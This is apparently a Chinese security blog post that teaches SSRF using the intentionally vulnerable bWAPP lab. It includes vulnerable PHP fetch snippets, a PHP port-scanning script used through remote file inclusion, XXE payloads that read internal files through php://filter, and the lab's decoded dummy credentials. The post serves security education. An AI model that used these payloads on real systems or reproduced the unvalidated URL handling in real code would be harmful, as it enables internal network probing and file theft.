<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>由BWAPP学习SSRF | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="0x01浅谈SSRFSSRF的定义SSRF(server-site request forery，服务端请求伪造)是一种构造请求，有服务端发起请求的安全漏洞。一般情况下，SSRF的目标是与外部隔离的内网资源（因为他是从内部系统访问的，所有可以通过它攻击外网无法访问的内部系统，也就是把目标网站当中间人） SSRF的原理服务端提供了从其他服务器获取数据的功能，但是没有对内网目标地址做过滤限制。比如从指">
<meta property="og:type" content="article">
<meta property="og:title" content="由BWAPP学习SSRF">
<meta property="og:url" content="http://yoursite.com/2020/06/01/ssrf/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="0x01浅谈SSRFSSRF的定义SSRF(server-site request forery，服务端请求伪造)是一种构造请求，有服务端发起请求的安全漏洞。一般情况下，SSRF的目标是与外部隔离的内网资源（因为他是从内部系统访问的，所有可以通过它攻击外网无法访问的内部系统，也就是把目标网站当中间人） SSRF的原理服务端提供了从其他服务器获取数据的功能，但是没有对内网目标地址做过滤限制。比如从指">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2020/06/01/jyUub2sIZQYWLR4.jpg">
<meta property="og:image" content="https://i.loli.net/2020/06/01/hMXdyCjn1NigwD5.jpg">
<meta property="og:image" content="https://i.loli.net/2020/06/01/lq2UVjHN756YkIf.jpg">
<meta property="og:image" content="https://i.loli.net/2020/06/01/ujJfOPSUhtGRzZ4.jpg">
<meta property="og:image" content="https://i.loli.net/2020/06/01/d4lAvzhTQnZw8Ru.jpg">
<meta property="og:image" content="https://i.loli.net/2020/06/01/3v1VFPNqDfu4Rwo.jpg">
<meta property="og:image" content="https://i.loli.net/2020/06/01/5f7Koq8lJHMvI4Y.jpg">
<meta property="og:image" content="https://i.loli.net/2020/06/01/8bszNq9gG1x6o5J.jpg">
<meta property="og:image" content="https://i.loli.net/2020/06/01/svjixt5ZahKIMwN.jpg">
<meta property="og:image" content="https://i.loli.net/2020/06/01/OrZ94dYtnBgK8MJ.jpg">
<meta property="article:published_time" content="2020-06-01T11:10:20.000Z">
<meta property="article:modified_time" content="2020-06-01T12:59:52.297Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="web漏洞">
<meta property="article:tag" content="SSRF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/06/01/jyUub2sIZQYWLR4.jpg">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.0.2"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-ssrf" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/06/01/ssrf/" class="article-date">
  <time datetime="2020-06-01T11:10:20.000Z" itemprop="datePublished">2020-06-01</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      由BWAPP学习SSRF
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="0x01浅谈SSRF"><a href="#0x01浅谈SSRF" class="headerlink" title="0x01浅谈SSRF"></a>0x01浅谈SSRF</h1><h2 id="SSRF的定义"><a href="#SSRF的定义" class="headerlink" title="SSRF的定义"></a>SSRF的定义</h2><p>SSRF(server-site request forery，服务端请求伪造)是一种构造请求，有服务端发起请求的安全漏洞。<font color='red'>一般情况下，SSRF的目标是与外部隔离的内网资源</font>（因为他是从内部系统访问的，所有可以通过它攻击外网无法访问的内部系统，也就是把目标网站当中间人）</p>
<h2 id="SSRF的原理"><a href="#SSRF的原理" class="headerlink" title="SSRF的原理"></a>SSRF的原理</h2><p>服务端提供了从其他服务器获取数据的功能，但是没有对内网目标地址做过滤限制。比如从指定URL地址获取网页文本内容，加载指定地址的图片，文档，等等。为了便于理解我们可以举个例子：比如 ： A网站，是一个所有人都可以访问的外网网站，B网站是一个他们内部的OA网站。所以，我们普通用户只可以访问a网站，不能访问b网站。但是我们可以同过a网站做中间人，访问b网站，从而达到攻击b网站需求。</p>
<h2 id="SSRF的利用方式"><a href="#SSRF的利用方式" class="headerlink" title="SSRF的利用方式"></a>SSRF的利用方式</h2><ol>
<li>对外网，服务器所在内网，本地进行端口扫描，获取Banner信息，探测内网资源。</li>
<li>测试运行在内网或本地的应用程序。</li>
<li>利用file协议读取本地敏感文件等</li>
</ol>
<h1 id="0x02通过代码分析SSRF"><a href="#0x02通过代码分析SSRF" class="headerlink" title="0x02通过代码分析SSRF"></a>0x02通过代码分析SSRF</h1><h2 id="产生SSRF漏洞的函数以及代码分析"><a href="#产生SSRF漏洞的函数以及代码分析" class="headerlink" title="产生SSRF漏洞的函数以及代码分析"></a>产生SSRF漏洞的函数以及代码分析</h2><h3 id="file-get-content"><a href="#file-get-content" class="headerlink" title="file_get_content()"></a>file_get_content()</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  <span class="comment">//使用file_get_contents()函数构造ssrf。</span></span><br><span class="line">    <span class="comment">//下面代码的内容为：使用file_get_contents()函数从用户指定的url中获取图片，把图片用一个随机url保存然后展示给用户。</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">&quot;url&quot;</span>])) &#123;</span><br><span class="line">        <span class="comment"># code...</span></span><br><span class="line">        $content = file_get_contents($_POST[<span class="string">&quot;url&quot;</span>]);    <span class="comment">//使用file_get_contents()函数获取url中的内容</span></span><br><span class="line">        $filename = <span class="string">&#x27;./images/&#x27;</span> . rand() . <span class="string">&#x27;.img&#x27;</span>;    <span class="comment">//构建保存文件的路径</span></span><br><span class="line">        file_put_contents($filename, $content);    <span class="comment">//将$content的内容写入$filename中</span></span><br><span class="line">        <span class="keyword">echo</span> $_POST[<span class="string">&quot;url&quot;</span>];</span><br><span class="line">        $img = <span class="string">&quot;&lt;img src=\&quot;&quot;</span>.filename.<span class="string">&quot;\&quot;/&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;使用file_get_contents()函数构造ssrf&quot;</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line">    <span class="keyword">echo</span> $img;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2020/06/01/jyUub2sIZQYWLR4.jpg" alt="Xnip2020-06-01_19-46-12.jpg"></p>
<h3 id="fsockopen"><a href="#fsockopen" class="headerlink" title="fsockopen()"></a>fsockopen()</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$host=$_GET[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line">$fp = fsockopen(<span class="string">&quot;$host&quot;</span>, <span class="number">80</span>, $errno, $errstr, <span class="number">30</span>);</span><br><span class="line"><span class="keyword">if</span> (!$fp) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;$errstr ($errno)&lt;br /&gt;\n&quot;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    $out = <span class="string">&quot;GET / HTTP/1.1\r\n&quot;</span>;</span><br><span class="line">    $out .= <span class="string">&quot;Host: $host\r\n&quot;</span>;</span><br><span class="line">    $out .= <span class="string">&quot;Connection: Close\r\n\r\n&quot;</span>;</span><br><span class="line">    fwrite($fp, $out);</span><br><span class="line">    <span class="keyword">while</span> (!feof($fp)) &#123;</span><br><span class="line">        <span class="keyword">echo</span> fgets($fp, <span class="number">128</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    fclose($fp);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2020/06/01/hMXdyCjn1NigwD5.jpg" alt="Xnip2020-06-01_20-02-03.jpg"></p>
<h3 id="curl-exec"><a href="#curl-exec" class="headerlink" title="curl_exec()"></a>curl_exec()</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">curl</span>(<span class="params">$url</span>)</span>&#123;    <span class="comment">//调用curl库</span></span><br><span class="line">        $ch = curl_init();</span><br><span class="line">        curl_setopt($ch, CURLOPT_URL, $url);</span><br><span class="line">        curl_setopt($ch, CURLOPT_HEADER, <span class="number">0</span>);</span><br><span class="line">        curl_exec($ch);</span><br><span class="line">        curl_close($ch);</span><br><span class="line">    &#125;</span><br><span class="line">    @$url = $_GET[<span class="string">&quot;url&quot;</span>];</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;试试读取文件吧&quot;</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;pre&gt;&quot;</span>;</span><br><span class="line">    curl($url);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;/pre&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2020/06/01/lq2UVjHN756YkIf.jpg" alt="Xnip2020-06-01_19-57-08.jpg"></p>
<p><font color='red'>curl_exec常见的利用方式是通过file，dict，gopher这三个协议来进行渗透</font></p>
<h1 id="0x03通过BWAPP学习SSRF"><a href="#0x03通过BWAPP学习SSRF" class="headerlink" title="0x03通过BWAPP学习SSRF"></a>0x03通过BWAPP学习SSRF</h1><h2 id="利用远程文件包含进行端口扫描（内网信息探测）"><a href="#利用远程文件包含进行端口扫描（内网信息探测）" class="headerlink" title="利用远程文件包含进行端口扫描（内网信息探测）"></a>利用远程文件包含进行端口扫描（内网信息探测）</h2><p>扫描端口php脚本：(21, 22, 23, 25, 53, 80, 110, 1433, 3306)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.</span></span><br><span class="line"><span class="comment">It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities.</span></span><br><span class="line"><span class="comment">bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!</span></span><br><span class="line"><span class="comment">It is for educational purposes only.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Enjoy!</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Malik Mesellem</span></span><br><span class="line"><span class="comment">Twitter: <span class="doctag">@MME</span>_IT</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Â© 2013 MME BVBA. All rights reserved.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;script&gt;alert(\&quot;U 4r3 0wn3d by MME!!!\&quot;);&lt;/script&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_REQUEST[<span class="string">&quot;ip&quot;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">//list of port numbers to scan</span></span><br><span class="line">    $ports = <span class="keyword">array</span>(<span class="number">21</span>, <span class="number">22</span>, <span class="number">23</span>, <span class="number">25</span>, <span class="number">53</span>, <span class="number">80</span>, <span class="number">110</span>, <span class="number">1433</span>, <span class="number">3306</span>);</span><br><span class="line">    </span><br><span class="line">    $results = <span class="keyword">array</span>();</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">foreach</span>($ports <span class="keyword">as</span> $port)</span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>($pf = @fsockopen($_REQUEST[<span class="string">&quot;ip&quot;</span>], $port, $err, $err_string, <span class="number">1</span>))</span><br><span class="line">        &#123;</span><br><span class="line"></span><br><span class="line">            $results[$port] = <span class="literal">true</span>;</span><br><span class="line">            fclose($pf);</span><br><span class="line">            </span><br><span class="line">        &#125;</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line"></span><br><span class="line">            $results[$port] = <span class="literal">false</span>;        </span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">foreach</span>($results <span class="keyword">as</span> $port=&gt;$val)</span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">        $prot = getservbyport($port,<span class="string">&quot;tcp&quot;</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Port $port ($prot): &quot;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>($val)</span><br><span class="line">        &#123;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;span style=\&quot;color:green\&quot;&gt;OK&lt;/span&gt;&lt;br/&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;span style=\&quot;color:red\&quot;&gt;Inaccessible&lt;/span&gt;&lt;br/&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2020/06/01/ujJfOPSUhtGRzZ4.jpg" alt="Xnip2020-06-01_20-16-23.jpg"></p>
<p>通过可控参数language远程包含php脚本，进行内网端口扫描。</p>
<p><img src="https://i.loli.net/2020/06/01/d4lAvzhTQnZw8Ru.jpg" alt="Xnip2020-06-01_20-20-24.jpg"></p>
<p><img src="https://i.loli.net/2020/06/01/3v1VFPNqDfu4Rwo.jpg" alt="Xnip2020-06-01_20-21-26.jpg"></p>
<p>成功探测内网192.168.1.100端口信息。</p>
<h2 id="利用XXE获取敏感文件中的内容（获取文件内容）"><a href="#利用XXE获取敏感文件中的内容（获取文件内容）" class="headerlink" title="利用XXE获取敏感文件中的内容（获取文件内容）"></a>利用XXE获取敏感文件中的内容（获取文件内容）</h2><p>构造payload，使用http协议读取172.16.38.153下robots.txt</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version = &quot;1.0&quot;?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">note</span> [</span></span><br><span class="line"><span class="meta">    <span class="meta">&lt;!ENTITY <span class="meta-keyword">hacker</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;http://172.16.38.153/bWAPP/bWAPP/robots.txt&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">reset</span>&gt;</span><span class="tag">&lt;<span class="name">login</span>&gt;</span><span class="symbol">&amp;hacker;</span><span class="tag">&lt;/<span class="name">login</span>&gt;</span><span class="tag">&lt;<span class="name">secret</span>&gt;</span>Any bugs?<span class="tag">&lt;/<span class="name">secret</span>&gt;</span><span class="tag">&lt;/<span class="name">reset</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2020/06/01/5f7Koq8lJHMvI4Y.jpg" alt="Xnip2020-06-01_20-32-39.jpg"></p>
<p>成功读取robots.txt</p>
<p>使用php协议获取172.16.38.153/bWAPP/bWAPP/passwords/heroes.xml中的经过base64编码的数据</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version = &quot;1.0&quot;?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">note</span> [</span></span><br><span class="line"><span class="meta">    <span class="meta">&lt;!ENTITY <span class="meta-keyword">hacker</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;php://filter/read=convert.base64-encode/resource=http://172.16.38.153/bWAPP/bWAPP/passwords/heroes.xml&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">reset</span>&gt;</span><span class="tag">&lt;<span class="name">login</span>&gt;</span><span class="symbol">&amp;hacker;</span><span class="tag">&lt;/<span class="name">login</span>&gt;</span><span class="tag">&lt;<span class="name">secret</span>&gt;</span>Any bugs?<span class="tag">&lt;/<span class="name">secret</span>&gt;</span><span class="tag">&lt;/<span class="name">reset</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2020/06/01/8bszNq9gG1x6o5J.jpg" alt="Xnip2020-06-01_20-36-42.jpg"></p>
<p>得到经过base64编码的数据，我们放到burpsuite中解码</p>
<p><img src="https://i.loli.net/2020/06/01/svjixt5ZahKIMwN.jpg" alt="Xnip2020-06-01_20-39-57.jpg"></p>
<p>解码内容如下</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">heroes</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">hero</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">id</span>&gt;</span>1<span class="tag">&lt;/<span class="name">id</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">login</span>&gt;</span>neo<span class="tag">&lt;/<span class="name">login</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">password</span>&gt;</span>trinity<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">secret</span>&gt;</span>Oh why didn&#x27;t I took that BLACK pill?<span class="tag">&lt;/<span class="name">secret</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">movie</span>&gt;</span>The Matrix<span class="tag">&lt;/<span class="name">movie</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">genre</span>&gt;</span>action sci-fi<span class="tag">&lt;/<span class="name">genre</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">hero</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">hero</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">id</span>&gt;</span>2<span class="tag">&lt;/<span class="name">id</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">login</span>&gt;</span>alice<span class="tag">&lt;/<span class="name">login</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">password</span>&gt;</span>loveZombies<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">secret</span>&gt;</span>There&#x27;s a cure!<span class="tag">&lt;/<span class="name">secret</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">movie</span>&gt;</span>Resident Evil<span class="tag">&lt;/<span class="name">movie</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">genre</span>&gt;</span>action horror sci-fi<span class="tag">&lt;/<span class="name">genre</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">hero</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">hero</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">id</span>&gt;</span>3<span class="tag">&lt;/<span class="name">id</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">login</span>&gt;</span>thor<span class="tag">&lt;/<span class="name">login</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">password</span>&gt;</span>Asgard<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">secret</span>&gt;</span>Oh, no... this is Earth... isn&#x27;t it?<span class="tag">&lt;/<span class="name">secret</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">movie</span>&gt;</span>Thor<span class="tag">&lt;/<span class="name">movie</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">genre</span>&gt;</span>action sci-fi<span class="tag">&lt;/<span class="name">genre</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">hero</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">hero</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">id</span>&gt;</span>4<span class="tag">&lt;/<span class="name">id</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">login</span>&gt;</span>wolverine<span class="tag">&lt;/<span class="name">login</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">password</span>&gt;</span>Log@N<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">secret</span>&gt;</span>What&#x27;s a Magneto?<span class="tag">&lt;/<span class="name">secret</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">movie</span>&gt;</span>X-Men<span class="tag">&lt;/<span class="name">movie</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">genre</span>&gt;</span>action sci-fi<span class="tag">&lt;/<span class="name">genre</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">hero</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">hero</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">id</span>&gt;</span>5<span class="tag">&lt;/<span class="name">id</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">login</span>&gt;</span>johnny<span class="tag">&lt;/<span class="name">login</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">password</span>&gt;</span>m3ph1st0ph3l3s<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">secret</span>&gt;</span>I&#x27;m the Ghost Rider!<span class="tag">&lt;/<span class="name">secret</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">movie</span>&gt;</span>Ghost Rider<span class="tag">&lt;/<span class="name">movie</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">genre</span>&gt;</span>action sci-fi<span class="tag">&lt;/<span class="name">genre</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">hero</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">hero</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">id</span>&gt;</span>6<span class="tag">&lt;/<span class="name">id</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">login</span>&gt;</span>selene<span class="tag">&lt;/<span class="name">login</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">password</span>&gt;</span>m00n<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">secret</span>&gt;</span>It wasn&#x27;t the Lycans. It was you.<span class="tag">&lt;/<span class="name">secret</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">movie</span>&gt;</span>Underworld<span class="tag">&lt;/<span class="name">movie</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">genre</span>&gt;</span>action horror sci-fi<span class="tag">&lt;/<span class="name">genre</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">hero</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">heroes</span>&gt;</span></span><br></pre></td></tr></table></figure>



<p>使用file协议获取bWAPP本机的boot.ini的内容获得操作系统版本</p>
